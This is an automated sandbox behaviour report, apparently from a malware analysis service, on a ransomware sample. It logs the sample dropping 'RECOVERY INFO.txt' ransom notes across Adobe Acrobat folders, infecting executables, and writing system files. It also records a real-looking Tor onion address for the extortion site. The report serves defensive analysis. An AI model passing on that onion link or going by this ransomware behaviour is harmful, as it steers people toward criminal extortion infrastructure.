Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-tw\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugins\rhp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\dc-annotations\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-gb\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sk-sk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sl-si\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\tr-tr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\uk-ua\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-cn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-tw\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\images\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\sk-sk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-si\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\tr-tr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\uk-ua\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-cn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-tw\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\images\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-gb\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior

Source: 2b7cu0KwZl.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe

System file written: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe

Jump to behavior

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File opened: C:\Documents and Settings\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File opened: C:\Documents and Settings\All Users\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File opened: C:\Documents and Settings\All Users\Package Cache\{D5D19E2F-7189-42FE-8103-92CD1FA457C2}v14.36.32532\packages\	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File opened: C:\Documents and Settings\All Users\Package Cache\{D5D19E2F-7189-42FE-8103-92CD1FA457C2}v14.36.32532\	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File opened: C:\Documents and Settings\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json.bk	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File opened: C:\Documents and Settings\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json.bk	Jump to behavior

Networking

Found Tor onion address

Source: RECOVERY INFO.txt62.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt283.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt37.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt10.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt196.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt153.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt89.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt257.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt155.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt56.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt52.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt275.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt115.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt253.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
